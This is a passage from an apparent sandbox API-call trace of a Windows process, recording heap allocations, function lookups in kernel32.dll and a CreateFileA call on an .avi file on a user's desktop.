lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0032.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0032.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0032.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0032.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0032.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0032.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0032.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0032.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0032.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0032.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0032.353] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0032.353] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.353] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0032.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0032.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0032.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0032.353] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0032.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0032.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0032.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af558 [0032.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0032.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0032.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0032.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0032.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0032.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca00 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0032.354] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0032.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0032.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0032.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0032.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0032.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0032.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0032.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0032.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0032.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0032.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0032.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0032.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0032.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0032.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0032.355] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0032.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0032.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0032.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0032.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0032.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.356] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0032.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0032.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0032.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0032.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0032.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0032.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0032.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0032.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0032.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0032.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.358] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.358] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0032.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c8c8 [0032.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c8c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0032.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.359] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0032.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0032.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0032.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0032.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8c8 [0032.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c8c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0032.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.359] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0032.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0032.359] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0032.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0032.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0032.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0032.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0032.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0032.359] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0032.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0032.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0032.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yMGnX teTW q8biNT2J.avi", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0032.360] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3e) returned 0x7ab260 [0032.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yMGnX teTW q8biNT2J.avi", cchWideChar=62, lpMultiByteStr=0x7ab260, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yMGnX teTW q8biNT2J.avi", lpUsedDefaultChar=0x0) returned 62 [0032.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0032.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0032.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0032.360] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0032.360] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yMGnX teTW q8biNT2J.avi" (normalized: "c:\\users\\5p5nrgjn0js 